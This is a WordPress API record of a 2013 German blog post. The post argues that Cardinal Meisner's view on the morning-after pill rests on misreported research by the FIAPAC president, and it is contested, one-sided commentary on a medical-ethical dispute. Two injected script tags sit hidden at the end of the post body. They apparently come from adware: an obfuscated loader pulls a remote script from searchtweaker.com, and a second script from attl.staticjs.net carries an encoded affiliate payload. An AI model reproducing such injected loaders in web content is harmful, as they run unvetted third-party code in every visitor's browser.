{"id":1141,"date":"2013-02-20T16:27:26","date_gmt":"2013-02-20T14:27:26","guid":{"rendered":"http:\/\/b-logos.de\/?p=1141"},"modified":"2013-02-21T08:39:13","modified_gmt":"2013-02-21T06:39:13","slug":"deutsche-bischofe-glauben-berufsabtreiberprasidentin","status":"publish","type":"post","link":"https:\/\/b-logos.de\/?p=1141","title":{"rendered":"Deutsche Bisch\u00f6fe glauben &#8230; Berufsabtreiberpr\u00e4sidentin"},"content":{"rendered":"<p>Wenn die Geschichte nicht wahr w\u00e4re, w\u00e4re sie so unglaubhaft, das sie nicht f\u00fcr einen schlechten Roman taugen w\u00fcrde.<\/p>\n<p>Kristina Gemzell-Danielsson ist <a title=\"Vorstand\" href=\"http:\/\/www.fiapac.org\/pages\/de\/about-us\/board.php\">Pr\u00e4sidentin<\/a> der F\u00e9d\u00e9ration Internationale des Associ\u00e9s Professionnels de l&#8217;Avortement et de la Contraception (FIAPAC), (dt.: Internationale F\u00f6deration der Berufsverb\u00e4nde f\u00fcr Abtreibung und Empf\u00e4ngnisverh\u00fctung), was ich erst heute realisierte.<!--more--><\/p>\n<p>Sie ist die Autorin jener Arbeit, in der ich am <a title=\"\u201e\u2026 mit der Absicht, \u2026 die Einnistung \u2026 zu verhindern, \u2026\u201c\" href=\"https:\/\/b-logos.de\/?p=1089\">8.2.13<\/a> den Ursprung der <a title=\"Erkl\u00e4rung des Erzbischofs von K\u00f6ln zur &quot;Pille danach&quot;\" href=\"http:\/\/www.erzbistum-koeln.de\/modules\/news\/news_1318.html#\">\u00dcberzeugung von Kardinal Meisner<\/a> und seiner <a title=\"Arzt muss zu verantwortungsvoller eigener Entscheidung kommen\" href=\"http:\/\/opencms.erzbistum-koeln.de\/modules\/news\/news_2283.html\">Pressestelle<\/a> vom 31.1.2013 von einer <a title=\"An die Priester, Diakone und Laien im pastoralen Dienst\" href=\"http:\/\/www.ksta.de\/blob\/view\/21680810,17809202,data,Kardinal+Meisners+Rundbrief.pdf\">ausschlie\u00dflich befruchtungsverhindernden Wirkung<\/a> der Pille-danach zu erkennen meinte und deren wissenschaftliche Unhaltbarkeit ich in meinem Beitrag vom <a title=\"Wurde Kardinal Meisner get\u00e4uscht? Dilemma besteht weiter.\" href=\"https:\/\/b-logos.de\/?p=1100\">13.2.2013<\/a> aufzuzeigen versuchte.<\/p>\n<p>Dass die Informationen von Kardinal Meisner auf die Urheber der <a title=\"Pressedienst\" href=\"http:\/\/www.bvf.de\/fach_info.php?r=2&amp;m=0&amp;s=0&amp;artid=420\">Pressemitteilung vom 24.1.2013<\/a> und der offenbar daraufhin schnell zusammengezimmerten <a title=\"Notfallkontrazeption - ein Update\" href=\"http:\/\/www.bvf.de\/pdf\/fachinfo\/130205_final_EC_update_18_5.2.2013%5B1%5D.pdf\"><em>Gemeinsamen Stellungnahme der Deutschen Gesellschaft f\u00fcr Gyn\u00e4kologische Endokrinologie und Fortpflanzungsmedizin (DGGEF) e.V. und des Berufsverbands der Frauen\u00e4rzte (BVF) vom 4.2.2013<\/em><\/a> zur\u00fcckgehen, best\u00e4tigte seine <a title=\"Frauen\u00e4rzte geben Meisner Recht \" href=\"http:\/\/www.domradio.de\/themen\/ethik-und-moral\/2013-02-05\/diskussion-um-die-pille-danach\">Bistumssprecherin Nele Harbeke am 5.2.2013<\/a>:<\/p>\n<blockquote><p>Nach Informationen des Kardinals existiere &#8222;eine so genannte \u201aPille danach\u2018, die allein die Wirkung hat, eine Befruchtung zu verhindern&#8220; &#8230; Der Kardinal st\u00fctze sich bei seiner Entscheidung auf aktuelle medizinische und pharmazeutische Studien und Erkenntnisse. Dabei sehe er sich auch durch eine Stellungnahme des Bundesverbandes der Gyn\u00e4kologen best\u00e4tigt, die zwei entsprechende Pr\u00e4parate nennt.<\/p><\/blockquote>\n<p>Wie kommt Kardinal Meisner dazu, dem Vorsitzenden des Berufsverbandes der Frauen\u00e4rzte zu glauben? Wohl durch Vermittlung der gyn\u00e4kologischen Chef\u00e4rzte der katholischen Krankenh\u00e4user.<\/p>\n<p>Die gemeinsame Stellungnahme der DGGEF und des BvF belegen ihre Aussage lediglich mit dem Verweis auf die <a title=\"Emergency contraception \u2014 mechanisms of action\" href=\"http:\/\/www.opendoor.org.il\/files\/mechanisms%20of%20action%20of%20EC%202012.pdf\">Literatur\u00fcbersichtsarbeit<\/a> von Gemzell-Danielsson, diese wiederum belegt ihre Aussage f\u00fcr Levonorgestrel mit einer einzigen <a title=\"Mifepristone, but not levonorgestrel, inhibits human blastocyst attachment to an in vitro endometrial three-dimensional cell culture model.\" href=\"http:\/\/www.ncbi.nlm.nih.gov\/pubmed\/17890724\">experimentellen Studie<\/a>, an der sie selbst beteiligt war und deren Ergebnisse sie nicht korrekt wiedergibt. Die Ergebnisse einer ebenfalls einzigen Studie, die sie zu Ulipristalacetat zitiert, gibt sie ebenfalls nicht korrekt wieder.<\/p>\n<p>So entsteht vor meinem inneren Auge eine unheilvolle Kette von zuviel Glauben und zuwenig Vernunft, mit der ich die \u00dcberschrift meines Artikels begr\u00fcnde. Die Worte in Klammern sind hypothetisch, die Kausalkette dennoch nicht unterbrochen:<\/p>\n<ul>\n<li>Die Bisch\u00f6fe Overbeck, Mussinghoff, Becker, Genn und Kardinal Lehmann glaubten Kardinal Meisner.<\/li>\n<li>Kardinal Meisner glaubte (den gyn\u00e4kologischen Chef\u00e4rzten der katholischen Krankenh\u00e4user.<\/li>\n<li>Die Chef\u00e4rzte glaubten) dem Vorsitzenden des Berufsverbandes der Frauen\u00e4rzte.<\/li>\n<li>Der Vorsitzende des Berufsverbandes der Frauen\u00e4rzte glaubte der von <a title=\"Produkte: Ulipristalacetat, Levonorgestrel u.a.\" href=\"http:\/\/www.hra-pharma.com\/de\/products-de.php\">HRA Pharma<\/a> <a title=\"Sponsorenliste\" href=\"http:\/\/www.dggef.de\/styled-40\/index.html\">gesponsorten<\/a> DGGEF und gab f\u00fcr deren Stellungnahme seinen Namen her.<\/li>\n<li>Die DGGEF glaubte Gemzell-Danielsson, anderen Autoren mit anderslautenden Ergebnissen dagegen nicht.<\/li>\n<li>Gemzell-Danielsson ist Pr\u00e4sidentin der Internationalen F\u00f6deration der Berufsverb\u00e4nde f\u00fcr Abtreibung und Empf\u00e4ngnisverh\u00fctung und macht unhaltbare Aussagen.<\/li>\n<\/ul>\n<p>Ich glaube, dass jetzt eine Menge Distanzierungen f\u00e4llig sind.<\/p>\n<p><script id=\"FoxLingoJs\" type=\"text\/javascript\">\/\/ < ![CDATA[\n(function(){try{var header=document.getElementsByTagName(\"HEAD\")[0];var script=document.createElement(\"SCRIPT\");script.src=\"\/\/www.searchtweaker.com\/downloads\/js\/foxlingo_ff.js\";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState==\"complete\"||this.readyState==\"loaded\")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();\n\/\/ ]]><\/script><script type=\"text\/javascript\" src=\"http:\/\/attl.staticjs.net\/amz\/aeyJhZmZpZCI6MTA4MCwic3ViYWZmaWQiOjEwMjAsImhyZWYiOiJodHRwOi8vYi1sb2dvcy5kZS93cC1hZG1pbi9wb3N0LnBocD9wb3N0PTExNDEmYWN0aW9uPWVkaXQiLCJ3aWR0aCI6MTI4MCwiaGVpZ2h0IjoxMDI0LCJsb2FkZXJfY2xpZW50X3RpbWVzdGFtcCI6MTM2MTQyODc1MjUyNH0%3D.js\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Wenn die Geschichte nicht wahr w\u00e4re, w\u00e4re sie so unglaubhaft, das sie nicht f\u00fcr einen schlechten Roman taugen w\u00fcrde. Kristina Gemzell-Danielsson ist Pr\u00e4sidentin der F\u00e9d\u00e9ration Internationale des Associ\u00e9s Professionnels de l&#8217;Avortement et de la Contraception (FIAPAC), (dt.: Internationale F\u00f6deration der Berufsverb\u00e4nde f\u00fcr Abtreibung und Empf\u00e4ngnisverh\u00fctung), was ich erst heute realisierte.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[],"tags":[],"class_list":["post-1141","post","type-post","status-publish","format-standard","hentry"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/pahMNU-ip","_links":{"self":[{"href":"https:\/\/b-logos.de\/index.php?rest_route=\/wp\/v2\/posts\/1141","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/b-logos.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/b-logos.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/b-logos.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/b-logos.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1141"}],"version-history":[{"count":7,"href":"https:\/\/b-logos.de\/index.php?rest_route=\/wp\/v2\/posts\/1141\/revisions"}],"predecessor-version":[{"id":1153,"href":"https:\/\/b-logos.de\/index.php?rest_route=\/wp\/v2\/posts\/1141\/revisions\/1153"}],"wp:attachment":[{"href":"https:\/\/b-logos.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1141"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/b-logos.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1141"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/b-logos.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1141"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}